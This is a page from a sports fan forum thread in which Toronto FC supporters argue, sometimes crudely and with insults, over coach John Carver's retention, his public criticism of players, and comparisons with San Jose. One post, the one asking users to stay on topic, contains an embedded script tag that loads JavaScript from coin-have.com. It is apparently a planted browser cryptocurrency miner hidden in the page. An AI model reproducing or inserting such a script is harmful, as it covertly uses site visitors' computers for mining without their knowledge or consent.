Page 2 of 3 FirstFirst 123 LastLast
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Pigfynn View Post
    I doubt that.

I'm starting to think that about 60-65% of the people on this forum are mindless drones, who hate the team and themselves.

You're right. In fact, they must have all watched a different season. It's not like we're a bottom feeder who has been second best tactically in just about every single game this season.

Right?

A similarity between blind optimists and blind pessimists? I can't find one.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ilikemusic View Post
    That will be music to the ears of Toronto fans who unfurled a huge sign reading "In Carver We Trust" during Saturday's 3-1 home loss to Chivas USA.

I wont say anything beyond this...

What a friggin joke. 'In Carver we trust'? Youve got to be joking me. The guy would rather bitch and moan about MLS' rules than deal with em and improve the team. Like every successful manager in this mickey mouse league.

Great, then I won't say anything beyond this...

That's one of the great things in this beloved country of ours and in this board for that matter. Everyone has the right to post their opinion, no matter how negative, clueless or just plain wrong they are!

-IN CARVER WE TRUST-

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Originally Posted by ilikemusic
    That will be music to the ears of Toronto fans who unfurled a huge sign reading "In Carver We Trust" during Saturday's 3-1 home loss to Chivas USA.

What a friggin joke. 'In Carver we trust'? Youve got to be joking me. The guy would rather bitch and moan about MLS' rules than deal with em and improve the team. Like every successful manager in this mickey mouse league.

^^^ go cry somewhere else.

i'm glad Carver is staying next season. i hope he turns this club around, at least it will shut up all the whiners on this board who are calling for his head.

in carver we trust!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

It sure will be an interesting off-season now that we have stability, lots of money, promise of real grass, and draft picks galore.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Bobo View Post
    You're right. In fact, they must have all watched a different season. It's not like we're a bottom feeder who has been second best tactically in just about every single game this season.

Right?

A similarity between blind optimists and blind pessimists? I can't find one.
    Assuming your false supposition that we were "second best tactically" were true; in more than half the games we lost, we outshot the opposition, several times substantially. And under Carver, we had the longest home shutout streak so far for the team. So tactically, you don't know what the fuck you're talking about.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Good news, John Carver's red army rolls on!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ensco View Post
    OK but I wonder if we should do an "open letter" type thing about his propensity to call players out in public. I have always wanted him to stay, but just cringe when he takes players apart in the press conferences

He's done it with Velez today - sure it's deserved, but that's not the point, there was no need to air this in public.

It may be refreshing, but it's divisive.
    I'm not so sure it's such a problem or so divisive. Certainly there are "player's coaches" who defend their guys too much and maybe Carver goes too far the other way, but not all players respond the same.

Maybe treating the players like professionals and adults is the right way to go.

Though I admit, you'll probably see less of it next year as he settles into the job more.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

you bitch and moan more then JC...and he has a right to do it as manger of the club, being forced to play short handed, this league has if faults,
    sure but mickey mo se league could be applied to the Premiership, Serie a
    and others. look at the way owners are bringing in players managers don't want in europe thats mickey mouse. Carver is the best man for TFC.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Please get rid of Mo then...something tells me those two don't work together.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Like every successful manager in this mickey mouse league.
    It's true, this league isn't for everyone. Doesn't look like it's for you. Oh well, no big deal, move on.

I watched some YouTube clips from the Belfast Giants hockey team and I realized if I lived there and followed that team I wouldn't be able to think about it as if it was the NHL.

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by RPB_Brantford_08 View Post
    you bitch and moan more then JC...and he has a right to do it as manger of the club, being forced to play short handed, this league has if faults,
    sure but mickey mo se league could be applied to the Premiership, Serie a
    and others. look at the way owners are bringing in players managers don't want in europe thats mickey mouse. Carver is the best man for TFC.

Cheers!

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shaughno View Post
    One game for Newcastle and 4 for Leeds if I recall correctly. He was also an Assistant manager at Luton Town before us.
    Oh wow,

so he had a grand toatl of 5 games as a head coach before he came to TFC.

My gosh I have to send a personal apology to him. I've been so hard on him but I didn't know. It's not his fault. He is just a young rookie coach learnung the ropes. Okay I say give him another 10 years

why then is he so hard on our rookie players?? Somewhat double satndards.......

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by RPB_RED_NATION_RPB View Post
    Carver was a Caretaker at both Luton and newcastle.....with means he was a coach on a temp basis at these clubs

Caretaker????

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by giambac View Post
    Caretaker????
    i thought...id also explain..what the meaning was....im sure you had no fooookin clue!

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by RPB_RED_NATION_RPB View Post
    i thought...id also explain..what the meaning was....im sure you had no fooookin clue!

He was a caretaker, a temp coach......
    Why couldn't he get a permanent gig??? I know he didn't want one. He preferred the MLS, the same league he continous to cut up each week.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

guys...ONE THREAD THAT DOESNT GO OFF PLEASE......
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC USA View Post
    Please get rid of Mo then...something tells me those two don't work together.

Mo needs time as well two years is not enough time to build a team in ANY sport and thats fact not fiction.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Mo needs time as well two years is not enough time to build a team in ANY sport and thats fact not fiction.
    So explain the SJ success this year...

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Beach_Red View Post
    I'm not so sure it's such a problem or so divisive. Certainly there are "player's coaches" who defend their guys too much and maybe Carver goes too far the other way, but not all players respond the same.

Maybe treating the players like professionals and adults is the right way to go.

Though I admit, you'll probably see less of it next year as he settles into the job more.
    Not to rehash a topic we've debated before, but, while successful coaches can be quite colourful post-game (think Mourinho or Ferguson), they never go as far as Carver does on a weekly basis
    “What the world needs is more geniuses with humility; there are so few of us left.”

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by AL-MO View Post

success? they are in a bad division.....the don;t have the int'l call ups we had to deal with,

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by br_aguilar View Post
    guys...ONE THREAD THAT DOESNT GO OFF PLEASE......
    lol

I just got a vision in my head of you being the babysitter and the posters being the annoying kids you have to take care of.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by ensco View Post
    Not to rehash a topic we've debated before, but, while successful coaches can be quite colourful post-game (think Mourinho or Ferguson), they never go as far as Carver does on a weekly basis
    I don't follow European football, but I'll take your word for it.

At the beginning of this year, Carver reminded me of US college football coach. That's kind of the way he treated the players and it's how he dressed.

Now he's wearing a tie and is coming back next year and I think you'll see a few more changes - the calling out of the players is one and the way he talks about the league is another.

All I'm saying is I don't think you need an open letter or anything, I think he gets it (of course, if it continues, then sure).

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

success? they are in a bad division.....the don;t have the int'l call ups we had to deal with,

So what? They're still doing loads better than TFC with the full starters.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I'm glad he's back (and that Ives was wrong for once!).

We need the stability, and he has learned what this league is about.
    I'm expecting a better next year.

(BTW, San Jose's awesomeness is due not just to a weak division, but also because they have 2 top players Mo picked, who didn't want to play on turf so went to SJ instead. Huckerby and O'Brien).
    MLS is a tough, physical league, that emphasizes speed, and features plastic fields, grueling travel, extreme weather, and incompetent refs. - NK Toronto

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by AL-MO View Post
    Sure. They mortgaged their future, in order to have mild success in the present.

They traded away their draft pick, a bunch of allocation money, and their success is entirely dependent on a midfielder in his mid-thirties, who could retire at any time.

After our second year, we managed to get a bunch of new players, allocation money out the wazoo, lots of cap space, and more draft picks than we know what to do with.

We are in better shape than San Jose.

- Scott
    “Heroism breaks its heart, and idealism its back, on the intransigence of the credulous and the mediocre, manipulated by the cynical and the corrupt.” ~Christopher Hitchens

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by jloome View Post
    Assuming your false supposition that we were "second best tactically" were true; in more than half the games we lost, we outshot the opposition, several times substantially. And under Carver, we had the longest home shutout streak so far for the team. So tactically, you don't know what the fuck you're talking about.
    So then we play effective football? It's ugly and we lose...

"The longest home shutout streak so far"? What the fuck does that mean? lol. Hey, you didn't even bring up the fact that we haven't had a 9 game scoring drought this year.

Setting aside the fact that, they've been outshot the majority of the time (check the stats), some of those games in which they had more shots they got creeeeamed. Not to mention they were rediculously outshot on occasion. Shots make effective football? EPL fan I guess.

I like Carver a lot but not as head coach.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by TFC USA View Post
    So what? They're still doing loads better than TFC with the full starters.

they are not setting the league on fire....put them in the east and see how bad their record would really be.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shakes McQueen View Post
    Sure. They mortgaged their future, in order to have mild success in the present.

They traded away their draft pick, a bunch of allocation money, and their success is entirely dependent on a midfielder in his mid-thirties, who could retire at any time.

After our second year, we managed to get a bunch of new players, allocation money out the wazoo, lots of cap space, and more draft picks than we know what to do with.

We are in better shape than San Jose.

- Scott
    Ronnie O'Brien is 29 and Huckerby is 32 ... that's hardly retirement age in the MLS ... thats more like ... prime years.

Arturo Alvarez, Ryan Johnson 23, both starters ... both would be starters on our team.

Ryan Cochrane 24, James Riley 26, Jason Hernandez 23 ... I mean ... these are all starters and good ones too. I'd take Cochrane (an MLS champion) any day of the weak over Velez and Marshall. Riley is a pretty intriguing player also.

I dunno where this notion that they are an old team that has paid no attention to youth is coming from.

Ok ... fine, Joe Cannon is 33 ... but he's also probably one of the best 3 goalies in the league.

Hell even Ramiro Corrales isn't that old at 31.

The only really old player they have is Francesco Lima at 37.

Why do people make arguments with the blinders on? .... boh

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by giambac View Post
    Oh wow,

so he had a grand toatl of 5 games as a head coach before he came to TFC.

My gosh I have to send a personal apology to him. I've been so hard on him but I didn't know. It's not his fault. He is just a young rookie coach learnung the ropes. Okay I say give him another 10 years

why then is he so hard on our rookie players?? Somewhat double satndards.......
    no your right we all have to be hard on him if the suck from game we need to make sure to tell him that but then if he is doing something right we need to tell him to.

he said that in a post game video before he is a good head coach.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

i think we should give him a 5 yr no trade contract....WTF.
    2 wins in the last 16 or so games,brutal last min losses on the road and out of the CCL(that pisses me off the most this season)would it be great to be in the group stage now instead of mtl.
    maybe he can drive a bus in the off season,he has sure put enough players under the bus this season....